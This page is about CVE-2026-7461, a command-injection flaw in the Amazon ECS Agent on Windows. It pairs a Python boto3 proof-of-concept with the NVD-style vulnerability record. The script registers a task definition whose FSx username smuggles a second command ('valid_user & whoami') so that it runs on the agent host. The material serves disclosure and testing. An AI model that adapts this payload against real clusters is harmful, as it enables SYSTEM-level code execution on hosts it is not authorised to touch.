CVE-2026-7461

import boto3 def exploit_cve_2026_7461(cluster_name, task_def_family, fsx_id, secret_arn): """ PoC for CVE-2026-7461 Demonstrates OS Command Injection via FSx username in ECS Task Definition. Requires: boto3, AWS credentials with ecs:RegisterTaskDefinition permissions. """ client = boto3.client('ecs') # Malicious payload: 'user & whoami' (Will execute 'whoami' on the host) # Note: The actual command execution context depends on the ECS Agent implementation. malicious_username = "valid_user & whoami" container_definitions = [ { "name": "windows_container", "image": "mcr.microsoft.com/windows/servercore:ltsc2019", "cpu": 1024, "memory": 2048, "essential": True } ] volume_configuration = { "name": "fsx_volume", "fsxWindowsFileServerVolumeConfiguration": { "fileSystemId": fsx_id, "rootDirectory": "\\", "authorizationConfig": { "credentialsParameter": secret_arn, "domain": "corp.example.com", # VULNERABLE PARAMETER: User input is not sanitized "user": malicious_username } } } try: response = client.register_task_definition( family=task_def_family, containerDefinitions=container_definitions, volumes=[volume_configuration], requiresCompatibilities=['EC2'], networkMode='bridge' ) print(f"[+] Task definition registered: {response['taskDefinition']['taskDefinitionArn']}") print("[+] Running this task will trigger the command injection on the ECS Agent host.") except Exception as e: print(f"[-] Error registering task definition: {e}") if __name__ == "__main__": # Placeholder values exploit_cve_2026_7461( cluster_name="default", task_def_family="exploit-poc", fsx_id="fs-0123456789abcdef0", secret_arn="arn:aws:secretsmanager:us-east-1:123456789012:secret:fsx-creds-abc123" )

{"cve": {"id": "CVE-2026-7461", "sourceIdentifier": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "published": "2026-04-30T19:16:10.737", "lastModified": "2026-05-05T02:18:07.730", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper neutralization of inputs used in an OS command in the FSx Windows File Server volume mounting component in Amazon ECS Agent on Windows before version 1.103.0 might allow a remote authenticated threat actor to execute shell commands with SYSTEM privileges on the underlying host via a specially crafted username field in an ECS task definition. This issue requires permissions to register ECS task definitions or write to the Secrets Manager or SSM Parameter Store credentials used by the FSx volume configuration.\n\nTo remediate this issue, users should upgrade to version 1.103.0."}], "metrics": {"cvssMetricV40": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:amazon:amazon_ecs_container_agent:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.47.0", "versionEndExcluding": "1.103.0", "matchCriteriaId": "11C9BCEC-F7E3-4E82-B43E-59D82E4CEA52"}]}]}], "references": [{"url": "https://aws.amazon.com/security/security-bulletins/2026-024-aws/", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/aws/amazon-ecs-agent/releases/tag/v1.103.0", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Release Notes"]}, {"url": "https://github.com/aws/amazon-ecs-agent/security/advisories/GHSA-fc67-c4hg-q653", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Vendor Advisory"]}]}}